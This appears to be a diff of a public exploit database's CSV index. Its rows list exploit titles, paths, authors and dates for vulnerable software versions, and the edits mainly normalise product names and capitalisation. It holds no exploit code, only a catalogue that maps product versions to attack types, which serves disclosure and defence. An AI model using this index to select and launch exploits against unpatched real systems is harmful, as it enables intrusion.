Vulnerabilities",2014-11-17,"Manuel García Cárdenas",php,webapps,80 -35279,platforms/osx/dos/35279.html,"Safari 8.0 / OSX 10.10 - Crash (PoC)",2014-11-17,w3bd3vil,osx,dos,0 +35279,platforms/osx/dos/35279.html,"Apple Mac OS X Safari 8.0 - Crash (PoC)",2014-11-17,w3bd3vil,osx,dos,0 35280,platforms/windows/remote/35280.txt,".NET Remoting Services - Remote Command Execution",2014-11-17,"James Forshaw",windows,remote,0 35294,platforms/php/webapps/35294.txt,"Joomla! 'com_clan_members' Component - 'id' Parameter SQL Injection",2011-02-01,FL0RiX,php,webapps,0 35282,platforms/android/remote/35282.rb,"Samsung Galaxy KNOX Android Browser - Remote Code Execution",2014-11-18,Metasploit,android,remote,0 35283,platforms/php/remote/35283.rb,"MantisBT XmlImportExport Plugin - PHP Code Injection",2014-11-18,Metasploit,php,remote,80 -35300,platforms/php/webapps/35300.txt,"Wordpress TagNinja Plugin 1.0 - 'id' Parameter Cross-Site Scripting",2011-02-01,"AutoSec Tools",php,webapps,0 +35300,platforms/php/webapps/35300.txt,"WordPress TagNinja Plugin 1.0 - 'id' Parameter Cross-Site Scripting",2011-02-01,"AutoSec Tools",php,webapps,0 35301,platforms/php/webapps/35301.html,"Snowfox CMS 1.0 - Cross-Site Request Forgery (Add Admin) Exploit",2014-11-19,LiquidWorm,php,webapps,80 35302,platforms/linux/dos/35302.c,"MINIX 3.3.0 - Remote TCP/IP Stack Denial of Service",2014-11-19,nitr0us,linux,dos,31337 -35303,platforms/php/webapps/35303.txt,"Paid Memberships Pro 1.7.14.2 - Path Traversal",2014-11-19,"Kacper Szurek",php,webapps,80 +35303,platforms/php/webapps/35303.txt,"Paid Memberships Pro 1.7.14.2 - Directory Traversal",2014-11-19,"Kacper Szurek",php,webapps,80 35304,platforms/multiple/dos/35304.txt,"Oracle Java - Floating-Point Value Denial of Service",2011-02-01,"Konstantin Preisser",multiple,dos,0 35305,platforms/php/webapps/35305.txt,"ACollab - 't' Parameter SQL Injection",2011-02-01,"AutoSec Tools",php,webapps,0 35306,platforms/php/webapps/35306.txt,"TCExam 11.1.16 - 'user_password' Parameter Cross-Site Scripting",2011-02-02,"AutoSec Tools",php,webapps,0 35307,platforms/php/webapps/35307.py,"All In One Control Panel 1.4.1 - 'cp_menu_data_file.php' SQL Injection",2011-01-31,"AutoSec Tools",php,webapps,0 -35308,platforms/windows/remote/35308.html,"Microsoft Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064)",2014-11-20,"GradiusX & b33f",windows,remote,0 +35308,platforms/windows/remote/35308.html,"Microsoft Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / PowerShell VirtualAlloc (MS14-064)",2014-11-20,"GradiusX & b33f",windows,remote,0 35309,platforms/php/webapps/35309.txt,"Betsy 4.0 - 'page' Parameter Local File Inclusion",2011-02-02,MizoZ,php,webapps,0 35310,platforms/asp/webapps/35310.txt,"Web Wiz Forums 9.5 - Multiple SQL Injections",2011-03-23,eXeSoul,asp,webapps,0 35311,platforms/php/webapps/35311.txt,"Octeth Oempro 3.6.4 - SQL Injection / Information Disclosure",2011-02-03,"Ignacio Garrido",php,webapps,0 @@ -31823,14 +31826,14 @@ id,file,description,date,author,platform,type,port 35381,platforms/php/webapps/35381.txt,"xEpan 1.0.1 - Cross-Site Request Forgery",2014-11-26,"High-Tech Bridge SA",php,webapps,80 35322,platforms/windows/local/35322.txt,"Privacyware Privatefirewall 7.0 - Unquoted Service Path Privilege Escalation",2014-11-22,LiquidWorm,windows,local,0 35323,platforms/php/webapps/35323.md,"MyBB 1.8.2 - unset_globals() Function Bypass / Remote Code Execution",2014-11-22,"Taoguang Chen",php,webapps,0 -35324,platforms/php/webapps/35324.txt,"Wordpress CM Download Manager Plugin 2.0.0 - Code Injection",2014-11-22,"Phi Ngoc Le",php,webapps,0 +35324,platforms/php/webapps/35324.txt,"WordPress CM Download Manager Plugin 2.0.0 - Code Injection",2014-11-22,"Phi Ngoc Le",php,webapps,0 35325,platforms/hardware/webapps/35325.txt,"Netgear Wireless Router WNR500 - Parameter Traversal Arbitrary File Access Exploit",2014-11-22,LiquidWorm,hardware,webapps,0 -35326,platforms/windows/dos/35326.cpp,"Microsoft Windows - win32k.sys Denial of Service",2014-11-22,Kedamsky,windows,dos,0 +35326,platforms/windows/dos/35326.cpp,"Microsoft Windows - 'win32k.sys' Denial of Service",2014-11-22,Kedamsky,windows,dos,0 35380,platforms/php/remote/35380.rb,"Pandora Fms - SQL Injection Remote Code Execution",2014-11-26,Metasploit,php,remote,80 35327,platforms/php/webapps/35327.txt,"CiviCRM 3.3.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-08,"AutoSec Tools",php,webapps,0 35328,platforms/php/webapps/35328.txt,"UMI CMS 2.8.1.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-08,"High-Tech Bridge SA",php,webapps,0 35329,platforms/php/webapps/35329.txt,"PHPXref 0.7 - 'nav.html' Cross-Site Scripting",2011-02-09,MustLive,php,webapps,0 -35330,platforms/php/webapps/35330.txt,"ManageEngine ADSelfService Plus 4.4 - POST Request Manipulation Security Question",2011-02-10,"Core Security",php,webapps,0 +35330,platforms/php/webapps/35330.txt,"ManageEngine ADSelfService Plus 4.4 - POST Request manipulation Security Question",2011-02-10,"Core Security",php,webapps,0 35331,platforms/php/webapps/35331.txt,"ManageEngine ADSelfService Plus 4.4 - EmployeeSearch.cc Multiple Parameter Cross-Site Scripting",2011-02-10,"Core Security",php,webapps,0 35332,platforms/php/webapps/35332.txt,"Dolphin 7.0.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-10,"AutoSec Tools",php,webapps,0 35333,platforms/php/webapps/35333.py,"webERP 4.0.1 - 'InputSerialItemsFile.php' Arbitrary File Upload",2011-02-10,"AutoSec Tools",php,webapps,0 @@ -31840,20 +31843,20 @@ id,file,description,date,author,platform,type,port 35337,platforms/php/webapps/35337.txt,"TaskFreak 0.6.4 - print_list.php Multiple Parameter Cross-Site Scripting",2011-02-12,LiquidWorm,php,webapps,0 35338,platforms/php/webapps/35338.txt,"TaskFreak 0.6.4 - rss.php HTTP Referer Header Cross-Site Scripting",2011-02-12,LiquidWorm,php,webapps,0 35339,platforms/multiple/dos/35339.txt,"JourneyMap 5.0.0RC2 Ultimate Edition - Denial of Service (Resource Consumption)",2014-11-24,CovertCodes,multiple,dos,0 -35340,platforms/php/webapps/35340.txt,"Wordpress wpDataTables Plugin 1.5.3 - SQL Injection",2014-11-24,"Claudio Viviani",php,webapps,0 -35341,platforms/php/webapps/35341.py,"Wordpress wpDataTables Plugin 1.5.3 - Unauthenticated Arbitrary File Upload",2014-11-24,"Claudio Viviani",php,webapps,0 +35340,platforms/php/webapps/35340.txt,"WordPress wpDataTables Plugin 1.5.3 - SQL Injection",2014-11-24,"Claudio Viviani",php,webapps,0 +35341,platforms/php/webapps/35341.py,"WordPress wpDataTables Plugin 1.5.3 - Unauthenticated Arbitrary File Upload",2014-11-24,"Claudio Viviani",php,webapps,0 35342,platforms/aix/dos/35342.txt,"RobotStats 1.0 - HTML Injection",2014-11-24,"ZoRLu Bugrahan",aix,dos,0 35343,platforms/php/webapps/35343.txt,"Smarty Template Engine 2.6.9 - '$smarty.template' PHP Code Injection",2011-02-09,jonieske,php,webapps,0 -35344,platforms/php/webapps/35344.txt,"RobotStats 1.0 - (robot parameter) SQL Injection",2014-11-24,"ZoRLu Bugrahan",php,webapps,0 +35344,platforms/php/webapps/35344.txt,"RobotStats 1.0 - (robot Parameter) SQL Injection",2014-11-24,"ZoRLu Bugrahan",php,webapps,0 35345,platforms/hardware/dos/35345.txt,"TP-Link TL-WR740N - Denial Of Service",2014-11-24,LiquidWorm,hardware,dos,0 -35346,platforms/php/webapps/35346.txt,"DukaPress 2.5.2 - Path Traversal",2014-11-24,"Kacper Szurek",php,webapps,0 +35346,platforms/php/webapps/35346.txt,"DukaPress 2.5.2 - Directory Traversal",2014-11-24,"Kacper Szurek",php,webapps,0 35347,platforms/php/webapps/35347.txt,"Dokeos 1.8.6 2 - 'style' Parameter Cross-Site Scripting",2011-02-12,"AutoSec Tools",php,webapps,0 35348,platforms/php/webapps/35348.txt,"MG2 0.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-15,LiquidWorm,php,webapps,0 35349,platforms/php/webapps/35349.txt,"Gollos 2.8 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0 35350,platforms/php/webapps/35350.txt,"Wikipad 1.6.0 - Cross-Site Scripting / HTML Injection / Information Disclosure",2011-02-15,"High-Tech Bridge SA",php,webapps,0 35351,platforms/php/webapps/35351.txt,"Photopad 1.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0 35352,platforms/multiple/remote/35352.rb,"Ruby on Rails 3.0.5 - 'WEBrick::HTTPRequest' Module HTTP Header Injection",2011-02-16,"Jimmy Bandit",multiple,remote,0 -35353,platforms/php/webapps/35353.txt,"GetSimple CMS 2.03 - 'admin/upload-ajax.php' Arbitrary File Upload",2011-02-15,"s3rg3770 and Chuzz",php,webapps,0 +35353,platforms/php/webapps/35353.txt,"Getsimple CMS 2.03 - 'admin/upload-ajax.php' Arbitrary File Upload",2011-02-15,"s3rg3770 and Chuzz",php,webapps,0 35354,platforms/php/dos/35354.txt,"PHP 5.3.5 - 'grapheme_extract()' NULL Pointer Dereference Denial Of Service",2011-02-17,"Maksymilian Arciemowicz",php,dos,0 35356,platforms/linux/remote/35356.rb,"Hikvision DVR - RTSP Request Remote Code Execution",2014-11-24,Metasploit,linux,remote,554 35357,platforms/cgi/webapps/35357.txt,"Advantech EKI-6340 - Command Injection",2014-11-24,"Core Security",cgi,webapps,80 @@ -31863,36 +31866,36 @@ id,file,description,date,author,platform,type,port 35362,platforms/php/webapps/35362.txt,"Batavi 1.0 - Multiple Local File Inclusion / Cross-Site Scripting Vulnerabilities",2011-02-21,"AutoSec Tools",php,webapps,0 35363,platforms/windows/dos/35363.txt,"TRENDnet SecurView Wireless Network Camera TV-IP422WN - 'UltraCamX.ocx' Stack Buffer Overflow",2014-11-25,LiquidWorm,windows,dos,0 35364,platforms/multiple/remote/35364.txt,"IBM Lotus Sametime - stconf.nsf/WebMessage messageString Parameter Cross-Site Scripting",2011-02-21,"Dave Daly",multiple,remote,0 -35365,platforms/php/webapps/35365.py,"PHPMyRecipes 1.2.2 - (dosearch.php words_exact parameter) SQL Injection",2014-11-25,bard,php,webapps,80 +35365,platforms/php/webapps/35365.py,"PHPMyRecipes 1.2.2 - (dosearch.php words_exact Parameter) SQL Injection",2014-11-25,bard,php,webapps,80 35366,platforms/multiple/remote/35366.txt,"IBM Lotus Sametime - stconf.nsf Cross-Site Scripting",2011-02-21,"Dave Daly",multiple,remote,0 -35367,platforms/php/webapps/35367.txt,"crea8social 1.3 - Persistent Cross-Site Scripting",2014-11-25,"Halil Dalabasmaz",php,webapps,80 +35367,platforms/php/webapps/35367.txt,"Crea8Social 1.3 - Persistent Cross-Site Scripting",2014-11-25,"Halil Dalabasmaz",php,webapps,80 35369,platforms/multiple/dos/35369.txt,"Battlefield 2/2142 - Malformed Packet NULL Pointer Dereference Remote Denial Of Service",2011-02-22,"Luigi Auriemma",multiple,dos,0 35370,platforms/linux/local/35370.c,"Linux Kernel 3.14.5 (RHEL / CentOS 7) - 'libfutex' Privilege Escalation",2014-11-25,"Kaiqu Chen",linux,local,0 -35371,platforms/php/webapps/35371.txt,"Wordpress Google Document Embedder 2.5.14 Plugin - SQL Injection",2014-11-25,"Kacper Szurek",php,webapps,80 +35371,platforms/php/webapps/35371.txt,"WordPress Google Document Embedder 2.5.14 Plugin - SQL Injection",2014-11-25,"Kacper Szurek",php,webapps,80 35372,platforms/hardware/webapps/35372.rb,"Arris VAP2500 - Authentication Bypass",2014-11-25,HeadlessZeke,hardware,webapps,80 -35373,platforms/php/webapps/35373.txt,"Wordpress GD Star Rating Plugin 1.9.7 - 'wpfn' Parameter Cross-Site Scripting",2011-02-22,"High-Tech Bridge SA",php,webapps,0 +35373,platforms/php/webapps/35373.txt,"WordPress GD Star Rating Plugin 1.9.7 - 'wpfn' Parameter Cross-Site Scripting",2011-02-22,"High-Tech Bridge SA",php,webapps,0 35374,platforms/php/webapps/35374.txt,"IBM Lotus Sametime Server 8.0 - 'stcenter.nsf' Cross-Site Scripting",2011-02-22,andrew,php,webapps,0 35375,platforms/php/webapps/35375.txt,"Vanilla Forums 2.0.17.x - 'p' Parameter Cross-Site Scripting",2011-02-22,"Aung Khant",php,webapps,0 35376,platforms/php/webapps/35376.txt,"mySeatXT 0.164 - 'lang' Parameter Local File Inclusion",2011-02-16,"AutoSec Tools",php,webapps,0 35377,platforms/windows/local/35377.rb,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax' SEH Buffer Overflow",2014-11-26,"Muhamad Fadzil Ramli",windows,local,0 -35378,platforms/php/webapps/35378.txt,"Wordpress DB Backup Plugin - Arbitrary File Download",2014-11-26,"Ashiyane Digital Security Team",php,webapps,80 +35378,platforms/php/webapps/35378.txt,"WordPress DB Backup Plugin - Arbitrary File Download",2014-11-26,"Ashiyane Digital Security Team",php,webapps,80 35379,platforms/windows/dos/35379.go,"Elipse E3 - HTTP Denial of Service",2014-11-26,firebitsbr,windows,dos,80 35382,platforms/android/dos/35382.txt,"Android WAPPushManager - SQL Injection",2014-11-26,"Baidu X-Team",android,dos,0 35383,platforms/cgi/webapps/35383.rb,"Device42 WAN Emulator 2.3 - Traceroute Command Injection (Metasploit)",2014-11-26,"Brandon Perry",cgi,webapps,80 35384,platforms/cgi/webapps/35384.rb,"Device42 WAN Emulator 2.3 - Ping Command Injection (Metasploit)",2014-11-26,"Brandon Perry",cgi,webapps,80 -35385,platforms/php/webapps/35385.pl,"Wordpress Plugin Slider Revolution 3.0.95 / Showbiz Pro 1.7.1 - Arbitrary File Upload",2014-11-26,"Simo Ben Youssef",php,webapps,80 +35385,platforms/php/webapps/35385.pl,"WordPress Plugin Slider REvolution 3.0.95 / Showbiz Pro 1.7.1 - Arbitrary File Upload",2014-11-26,"Simo Ben Youssef",php,webapps,80 35386,platforms/linux/remote/35386.txt,"Logwatch Log File - Special Characters Privilege Escalation",2011-02-24,"Dominik George",linux,remote,0 35387,platforms/php/webapps/35387.txt,"phpShop 0.8.1 - 'page' Parameter Cross-Site Scripting",2011-02-25,"Aung Khant",php,webapps,0 35395,platforms/windows/local/35395.txt,"CCH Wolters Kluwer PFX Engagement 7.1 - Privilege Escalation",2014-11-28,"Information Paradox",windows,local,0 35391,platforms/php/webapps/35391.txt,"glFusion 1.1.x/1.2.1 - 'users.php' SQL Injection",2011-02-25,H3X,php,webapps,0 -35392,platforms/php/webapps/35392.txt,"Wordpress IGIT Posts Slider Widget Plugin 1.0 - 'src' Parameter Cross-Site Scripting",2011-02-23,"AutoSec Tools",php,webapps,0 -35393,platforms/php/webapps/35393.txt,"Wordpress ComicPress Manager Plugin 1.4.9 - 'lang' Parameter Cross-Site Scripting",2011-02-23,"AutoSec Tools",php,webapps,0 -35394,platforms/php/webapps/35394.txt,"Wordpress YT-Audio Plugin 1.7 - 'v' Parameter Cross-Site Scripting",2011-02-23,"AutoSec Tools",php,webapps,0 +35392,platforms/php/webapps/35392.txt,"WordPress IGIT Posts Slider Widget Plugin 1.0 - 'src' Parameter Cross-Site Scripting",2011-02-23,"AutoSec Tools",php,webapps,0 +35393,platforms/php/webapps/35393.txt,"WordPress ComicPress Manager Plugin 1.4.9 - 'lang' Parameter Cross-Site Scripting",2011-02-23,"AutoSec Tools",php,webapps,0 +35394,platforms/php/webapps/35394.txt,"WordPress YT-Audio Plugin 1.7 - 'v' Parameter Cross-Site Scripting",2011-02-23,"AutoSec Tools",php,webapps,0 35396,platforms/php/webapps/35396.txt,"xEpan 1.0.4 - Multiple Vulnerabilities",2014-11-28,"Parikesit , Kurawa",php,webapps,0 35397,platforms/php/webapps/35397.txt,"Drupal Cumulus Module 5.X-1.1/6.X-1.4 - 'tagcloud' Parameter Cross-Site Scripting",2011-02-23,MustLive,php,webapps,0 35398,platforms/multiple/remote/35398.pl,"KMPlayer 2.9.3.1214 - '.ksf' Remote Buffer Overflow",2011-02-28,KedAns-Dz,multiple,remote,0 35399,platforms/windows/remote/35399.pl,"DivX Player 6.x - '.dps' Remote Buffer Overflow",2011-02-28,KedAns-Dz,windows,remote,0 -35400,platforms/php/webapps/35400.txt,"BackWPup Plugin 1.4 for Wordpress - Multiple Information Disclosure Vulnerabilities",2011-02-28,"Danilo Massa",php,webapps,0 +35400,platforms/php/webapps/35400.txt,"BackWPup Plugin 1.4 for WordPress - Multiple Information Disclosure Vulnerabilities",2011-02-28,"Danilo Massa",php,webapps,0 35401,platforms/php/webapps/35401.txt,"SnapProof - 'retPageID' Parameter Cross-Site Scripting",2011-02-28,"difficult 511",php,webapps,0 35402,platforms/php/webapps/35402.txt,"Forritun - Multiple SQL Injections",2011-03-02,eXeSoul,php,webapps,0 35403,platforms/linux/dos/35403.c,"Linux Kernel 2.6.x - epoll Nested Structures Local Denial of Service",2011-03-02,"Nelson Elhage",linux,dos,0 @@ -31905,12 +31908,12 @@ id,file,description,date,author,platform,type,port 35410,platforms/windows/remote/35410.py,"InterPhoto Image Gallery 2.4.2 - 'IPLANG' Parameter Local File Inclusion",2011-03-04,"AutoSec Tools",windows,remote,0 35411,platforms/asp/webapps/35411.txt,"Kodak InSite 5.5.2 - Troubleshooting/DiagnosticReport.asp HeaderWarning Parameter Cross-Site Scripting",2011-03-07,Dionach,asp,webapps,0 35412,platforms/asp/webapps/35412.txt,"Kodak InSite 5.5.2 - Pages/login.aspx Language Parameter Cross-Site Scripting",2011-03-07,Dionach,asp,webapps,0 -35413,platforms/php/dos/35413.php,"Wordpress 4.0 - Denial of Service",2014-12-01,SECURELI.com,php,dos,80 -35414,platforms/php/dos/35414.txt,"Wordpress < 4.0.1 - Denial of Service",2014-12-01,"Javer Nieto and Andres Rojas",php,dos,80 +35413,platforms/php/dos/35413.php,"WordPress 4.0 - Denial of Service",2014-12-01,SECURELI.com,php,dos,80 +35414,platforms/php/dos/35414.txt,"WordPress < 4.0.1 - Denial of Service",2014-12-01,"Javer Nieto and Andres Rojas",php,dos,80 35415,platforms/php/dos/35415.txt,"Drupal < 7.34 - Denial of Service",2014-12-01,"Javer Nieto and Andres Rojas",php,dos,80 35416,platforms/php/webapps/35416.txt,"Interleave 5.5.0.2 - 'basicstats.php' Multiple Cross-Site Scripting Vulnerabilities",2011-03-03,"AutoSec Tools",php,webapps,0 35417,platforms/php/webapps/35417.php,"WS Interactive Automne 4.1 - 'admin/upload-controler.php' Arbitrary File Upload",2011-03-08,"AutoSec Tools",php,webapps,0 -35418,platforms/php/webapps/35418.txt,"Inline Gallery Wordpress Plugin 0.3.9 - 'do' Parameter Cross-Site Scripting",2011-03-08,"High-Tech Bridge SA",php,webapps,0 +35418,platforms/php/webapps/35418.txt,"Inline Gallery WordPress Plugin 0.3.9 - 'do' Parameter Cross-Site Scripting",2011-03-08,"High-Tech Bridge SA",php,webapps,0 35419,platforms/hardware/webapps/35419.txt,"Prolink PRN2001 - Multiple Vulnerabilities",2014-12-02,"Herman Groeneveld",hardware,webapps,0 35420,platforms/hardware/remote/35420.txt,"IPUX Cube Type CS303C IP Camera - 'UltraMJCamX.ocx' ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,remote,0 35421,platforms/hardware/remote/35421.txt,"IPUX CL5452/CL5132 IP Camera - 'UltraSVCamX.ocx' ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,remote,0 @@ -31920,26 +31923,26 @@ id,file,description,date,author,platform,type,port 36125,platforms/php/webapps/36125.txt,"Piwigo 2.7.3 - SQL Injection",2015-02-19,"Sven Schleier",php,webapps,80 35427,platforms/bsd/remote/35427.py,"tnftp - clientside BSD Exploit",2014-12-02,dash,bsd,remote,0 35428,platforms/php/webapps/35428.txt,"SQL Buddy 1.3.3 - Remote Code Execution",2014-12-02,"Fady Mohammed Osman",php,webapps,0 -35429,platforms/php/webapps/35429.txt,"PhotoSmash Galleries Wordpress Plugin 1.0.x - 'action' Parameter Cross-Site Scripting",2011-03-08,"High-Tech Bridge SA",php,webapps,0 -35430,platforms/php/webapps/35430.txt,"1 Flash Gallery Wordpress Plugin 0.2.5 - Cross-Site Scripting / SQL Injection",2011-03-08,"High-Tech Bridge SA",php,webapps,0 -35431,platforms/php/webapps/35431.txt,"RuubikCMS 1.0.3 - 'head.php' Cross-Site Scripting",2011-03-08,"Khashayar Fereidani",php,webapps,0 +35429,platforms/php/webapps/35429.txt,"PhotoSmash Galleries WordPress Plugin 1.0.x - 'action' Parameter Cross-Site Scripting",2011-03-08,"High-Tech Bridge SA",php,webapps,0 +35430,platforms/php/webapps/35430.txt,"1 Flash Gallery WordPress Plugin 0.2.5 - Cross-Site Scripting / SQL Injection",2011-03-08,"High-Tech Bridge SA",php,webapps,0 +35431,platforms/php/webapps/35431.txt,"Ruubikcms 1.0.3 - 'head.php' Cross-Site Scripting",2011-03-08,"Khashayar Fereidani",php,webapps,0 35432,platforms/linux/dos/35432.txt,"Wireshark 1.4.3 - NTLMSSP NULL Pointer Dereference Denial Of Service",2011-03-01,"Buildbot Builder",linux,dos,0 35433,platforms/osx/remote/35433.pl,"Apple QuickTime 7.5 - '.m3u' Remote Stack Buffer Overflow",2011-03-09,KedAns-Dz,osx,remote,0 35434,platforms/windows/remote/35434.txt,"WebKit 1.2.x - Local Webpage Cross Domain Information Disclosure",2011-03-09,"Aaron Sigel",windows,remote,0 -35435,platforms/php/webapps/35435.txt,"Lazyest Gallery Wordpress Plugin 1.0.26 - 'image' Parameter Cross-Site Scripting",2011-03-10,"High-Tech Bridge SA",php,webapps,0 +35435,platforms/php/webapps/35435.txt,"Lazyest Gallery WordPress Plugin 1.0.26 - 'image' Parameter Cross-Site Scripting",2011-03-10,"High-Tech Bridge SA",php,webapps,0 35436,platforms/php/webapps/35436.txt,"Xinha 0.96 - 'spell-check-savedicts.php' Multiple HTML Injection Vulnerabilities",2011-03-10,"John Leitch",php,webapps,0 35437,platforms/multiple/dos/35437.pl,"Air Contacts Lite - HTTP Packet Denial Of Service",2011-02-09,"Rodrigo Escobar",multiple,dos,0 -35438,platforms/cgi/webapps/35438.txt,"CosmoShop 10.05.00 - Multiple Cross-Site Scripting / SQL Injection",2011-03-10,"High-Tech Bridge SA",cgi,webapps,0 -35439,platforms/php/webapps/35439.txt,"Wordpress Nextend Facebook Connect Plugin 1.4.59 - Cross-Site Scripting",2014-12-02,"Kacper Szurek",php,webapps,80 -35440,platforms/osx/local/35440.rb,"Mac OSX - IOKit Keyboard Driver Privilege Escalation",2014-12-02,Metasploit,osx,local,0 +35438,platforms/cgi/webapps/35438.txt,"Cosmoshop 10.05.00 - Multiple Cross-Site Scripting / SQL Injection",2011-03-10,"High-Tech Bridge SA",cgi,webapps,0 +35439,platforms/php/webapps/35439.txt,"WordPress Nextend Facebook Connect Plugin 1.4.59 - Cross-Site Scripting",2014-12-02,"Kacper Szurek",php,webapps,80 +35440,platforms/osx/local/35440.rb,"Apple Mac OS X - IOKit Keyboard Driver Privilege Escalation",2014-12-02,Metasploit,osx,local,0 35441,platforms/multiple/remote/35441.rb,"Tincd - Post-Authentication Remote TCP Stack Buffer Overflow",2014-12-02,Metasploit,multiple,remote,655 35442,platforms/hardware/webapps/35442.txt,"EntryPass N5200 - Credentials Exposure",2014-12-02,"RedTeam Pentesting",hardware,webapps,0 35443,platforms/php/webapps/35443.txt,"TYPO3 ke DomPDF Extension - Remote Code Execution",2014-12-02,"RedTeam Pentesting",php,webapps,80 35444,platforms/php/webapps/35444.txt,"Lms Web Ensino - Multiple Input Validation Vulnerabilities",2011-03-04,waKKu,php,webapps,0 35445,platforms/linux/dos/35445.txt,"OpenLDAP 2.4.x - 'modrdn' NULL OldDN Remote Denial of Service",2011-01-03,"Serge Dubrouski",linux,dos,0 -35446,platforms/windows/remote/35446.pl,"Windows Movie Maker 2.1.4026 - '.avi' Remote Buffer Overflow",2011-03-10,KedAns-Dz,windows,remote,0 -35447,platforms/php/webapps/35447.txt,"Google Document Embedder 2.5.16 - mysql_real_escpae_string bypass SQL Injection",2014-12-03,"Securely (Yoo Hee man)",php,webapps,0 -35474,platforms/windows/remote/35474.py,"Windows Kerberos - Elevation of Privilege (MS14-068)",2014-12-05,"Sylvain Monne",windows,remote,0 +35446,platforms/windows/remote/35446.pl,"Microsoft Windows Movie Maker 2.1.4026 - '.avi' Remote Buffer Overflow",2011-03-10,KedAns-Dz,windows,remote,0 +35447,platforms/php/webapps/35447.txt,"Google Document Embedder 2.5.16 - mysql_real_escpae_string Bypass SQL Injection",2014-12-03,"Securely (Yoo Hee man)",php,webapps,0 +35474,platforms/windows/remote/35474.py,"Microsoft Windows Kerberos - Elevation of Privilege (MS14-068)",2014-12-05,"Sylvain Monne",windows,remote,0 35449,platforms/windows/local/35449.rb,"BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit (Ruby)",2014-12-03,"Muhamad Fadzil Ramli",windows,local,0 35450,platforms/linux/local/35450.txt,"VFU 4.10-1.1 - Buffer Overflow",2014-12-03,"Juan Sacco",linux,local,0 35451,platforms/php/webapps/35451.txt,"BoutikOne - categorie.php path Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0 @@ -31949,8 +31952,8 @@ id,file,description,date,author,platform,type,port 35455,platforms/php/webapps/35455.txt,"BoutikOne - rss_flash.php lang Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0 35456,platforms/php/webapps/35456.txt,"BoutikOne - rss_promo.php lang Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0 35457,platforms/php/webapps/35457.txt,"BoutikOne - rss_top10.php lang Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0 -35459,platforms/php/webapps/35459.txt,"Wordpress Cart66 Lite Ecommerce 1.5.1.17 Plugin - Blind SQL Injection",2014-12-03,"Kacper Szurek",php,webapps,80 -35460,platforms/php/webapps/35460.txt,"CodeArt Google MP3 Player Wordpress Plugin - File Disclosure Download",2014-12-03,"QK14 Team",php,webapps,80 +35459,platforms/php/webapps/35459.txt,"WordPress Cart66 Lite eCommerce 1.5.1.17 Plugin - Blind SQL Injection",2014-12-03,"Kacper Szurek",php,webapps,80 +35460,platforms/php/webapps/35460.txt,"CodeArt Google MP3 Player WordPress Plugin - File Disclosure Download",2014-12-03,"QK14 Team",php,webapps,80 35564,platforms/php/webapps/35564.txt,"DoceboLms 4.0.4 - 'index.php' Multiple HTML Injection Vulnerabilities",2011-04-03,LiquidWorm,php,webapps,0 35565,platforms/php/webapps/35565.txt,"Anantasoft Gazelle CMS 1.0 - Cross-Site Scripting / SQL Injection",2011-04-04,"kurdish hackers team",php,webapps,0 35462,platforms/hardware/webapps/35462.txt,"Technicolor DT5130 2.05.C29GV - Multiple Vulnerabilities",2014-12-04,Crash,hardware,webapps,80 @@ -31964,26 +31967,26 @@ id,file,description,date,author,platform,type,port 35470,platforms/php/webapps/35470.txt,"AplikaMedia CMS - 'page_info.php' SQL Injection",2011-03-16,H3X,php,webapps,0 35472,platforms/lin_x86-64/local/35472.txt,"Offset2lib - Bypassing Full ASLR On 64 bit Linux",2014-12-05,"Packet Storm",lin_x86-64,local,0 35473,platforms/php/webapps/35473.txt,"PBBoard CMS 3.0.1 - SQL Injection",2014-12-05,"Tran Dinh Tien",php,webapps,80 -35475,platforms/php/webapps/35475.txt,"Wordpress Sodahead Polls Plugin 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-17,"High-Tech Bridge SA",php,webapps,0 -35476,platforms/php/webapps/35476.txt,"Wordpress Rating-Widget Plugin 1.3.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-17,"Todor Donev",php,webapps,0 +35475,platforms/php/webapps/35475.txt,"WordPress Sodahead Polls Plugin 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-17,"High-Tech Bridge SA",php,webapps,0 +35476,platforms/php/webapps/35476.txt,"WordPress Rating-Widget Plugin 1.3.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-17,"Todor Donev",php,webapps,0 35477,platforms/php/webapps/35477.txt,"XOOPS 2.x - Multiple Cross-Site Scripting Vulnerabilities",2011-03-18,"Aung Khant",php,webapps,0 35478,platforms/linux/dos/35478.txt,"MHonArc 2.6.16 - Tag Nesting Remote Denial of Service",2010-12-21,anonymous,linux,dos,0 35479,platforms/php/webapps/35479.txt,"Web Poll Pro 1.0.3 - 'error' Parameter HTML Injection",2011-03-19,Hector.x90,php,webapps,0 35480,platforms/php/webapps/35480.txt,"Online store PHP script - Multiple Cross-Site Scripting / SQL Injection",2011-03-21,"kurdish hackers team",php,webapps,0 -35481,platforms/php/webapps/35481.txt,"NewsPortal 0.37 - 'post.php' Cross-Site Scripting",2011-03-21,"kurdish hackers team",php,webapps,0 +35481,platforms/php/webapps/35481.txt,"Newsportal 0.37 - 'post.php' Cross-Site Scripting",2011-03-21,"kurdish hackers team",php,webapps,0 35482,platforms/php/webapps/35482.txt,"PluggedOut Blog 1.9.9 - 'year' Parameter Cross-Site Scripting",2011-03-21,"kurdish hackers team",php,webapps,0 35483,platforms/php/dos/35483.txt,"PHP 5.3.x - 'Intl' Extension 'NumberFormatter::setSymbol()' Function Denial of Service",2011-03-10,thoger,php,dos,0 35484,platforms/php/dos/35484.php,"PHP 5.3.x - 'Zip' Extension 'stream_get_contents()' Function Denial of Service",2011-03-10,paulgao,php,dos,0 